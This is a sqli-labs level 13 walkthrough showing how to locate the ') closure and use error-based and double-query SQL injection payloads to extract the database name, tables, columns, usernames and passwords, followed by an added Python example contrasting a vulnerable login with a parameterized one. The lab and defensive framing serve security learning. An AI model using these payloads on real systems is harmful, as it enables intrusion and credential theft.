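# sqli-labs less13
Since less12 is almost the same as less11, with the single quote simply changed to "), we go straight to less13.
For less13 we start as usual by working out whether the injection point is numeric or string-based ...
We then find that the closure is ')
So we carry on:
admin ') order by n #
With n=1 and n=2 there is none of the output we expected, but when n=3 we can see
So we can conclude that the number of columns is 2.
Next, try admin ') union select 1,2 #
There is no echo position. Try appending 11') union select 1,2 # after passwd
Still nothing.
...
Next, try error-based injection.
Dump the database name: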
11') and (select 1 from (select count(*),concat(floor(rand(0)*2),database())as x from information_schema.tables group by x)as a)--+
11') and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name)from information_schema.tables where table_schema='security' limit 0,1))as x from information_schema.tables group by x )as a)#
11') and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(column_name)from information_schema.columns where table_name='users' limit 0,1))as x from information_schema.tables group by x )as a)#
11') and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#
11') and (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(password)from security.users limit 0,1))as x from information_schema.tables group by x )as a)#
...
Double-query injection can also be used:
')union select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))x from information_schema.tables group by x#
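
Why the `')` closure and the error channel work, and what removes both, as an added example that is not code from this post or from sqli-labs. It assumes the login query wraps each input in `('...')` (inferred from the closure found above) and uses an in-memory SQLite database with a constructed `users` row, so the comment marker is `-- ` instead of `#` and the leaked error is SQLite's ORDER BY message rather than MySQL's.

```python
import sqlite3

GENERIC = "login failed"

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def vulnerable_login(db, uname, passwd):
    # Input is pasted inside ('...'), so ') in the input ends the string
    # literal and the rest of the input is parsed as SQL.
    sql = ("SELECT username, password FROM users "
           f"WHERE username=('{uname}') AND password=('{passwd}') LIMIT 0,1")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the raw database error is the only output channel on a page
        # with no echo position, and it is enough to leak data.
        return f"DB error: {exc}"
    return "login ok" if row else GENERIC

def safe_login(db, uname, passwd):
    # Placeholders send the values separately from the SQL text, so quotes and
    # parentheses in the input are compared as data, never parsed.
    sql = ("SELECT username, password FROM users "
           "WHERE username=(?) AND password=(?) LIMIT 0,1")
    try:
        row = db.execute(sql, (uname, passwd)).fetchone()
    except sqlite3.Error:
        # Record the detail server-side; the client sees one generic answer.
        return GENERIC
    return "login ok" if row else GENERIC

if __name__ == "__main__":
    db = make_db()
    # Constructed inputs mirroring the column-count step of the walkthrough.
    for n in (2, 3):
        probe = f"admin') order by {n} -- "
        print(n, "|", vulnerable_login(db, probe, "x"),
              "|", safe_login(db, probe, "x"))
```

With the parameterized query and the generic failure message, every input from the walkthrough produces the same response, so neither the column count nor any error text is observable.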